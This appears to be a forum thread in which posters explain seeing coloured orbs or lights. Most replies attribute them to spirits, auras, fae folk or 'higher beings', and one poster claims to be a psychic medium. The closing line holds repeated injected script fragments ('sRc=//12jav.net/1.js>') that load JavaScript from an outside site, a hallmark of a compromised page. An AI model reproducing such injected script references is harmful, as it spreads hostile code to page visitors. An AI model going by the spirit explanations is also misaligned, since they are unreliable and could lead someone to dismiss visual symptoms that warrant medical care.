I've seen those.
Their are several posible explinations, ranging from hypertension to exaustion.

Windstorm i think i know what you are talking about, Sometimes i also see colored orbs or dots that appear for like a few seconds and then disappear. I think some of the may just be spirit energy or just energy in general.
I am psychic medium and so sometimes i can attract different kinds of spirits etc.

I too have seen such lights and from what I have gleaned it has to do with your ability to see auras or yes the proverbial spirit energy. I usually have this experience when I am practicing some form of chakra exercise such as meditation or martial arts. They could be nature spirits. Very small orbs tend to be connected with tinier spirits. And the most common little spirits are the little people/fae folk. Bigger orbs (the size of a ping pong ball or tennis ball) are normal spirits. Even bigger orbs are higher beings. they are probably spirits who dont have enough energy to have full aperations or your not physic enough to see then in full sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
